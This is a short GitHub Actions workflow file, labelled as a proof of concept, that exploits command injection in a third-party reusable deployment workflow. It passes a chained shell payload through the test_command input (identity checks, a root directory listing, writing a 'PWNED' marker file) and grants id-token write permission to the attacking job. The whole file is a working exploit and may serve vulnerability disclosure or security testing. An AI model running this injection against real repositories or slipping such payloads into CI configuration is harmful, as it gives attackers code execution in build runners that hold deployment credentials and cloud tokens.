name: Malicious Workflow PoC - RCE via test_command Injection
on:
  workflow_dispatch:

jobs:
  attack:
    permissions:
      id-token: write  # This line fixes the error
    uses: ultimateai/workflows/.github/workflows/deploy-from-branch.yml@main
    with:
      image_repo: 'dummy-repo/dummy-image'
      app_squad: 'dummy-squad'
      github_email: 'bot@example.com'
      github_user: 'github-actions-bot'
      k8s_manifests_repo: 'dummy-org/dummy-k8s-repo'
      branch_name: 'main'
      test_command: 'id; whoami; pwd; ls -la /; echo "PWNED" > /tmp/pwned.txt; cat /tmp/pwned.txt'
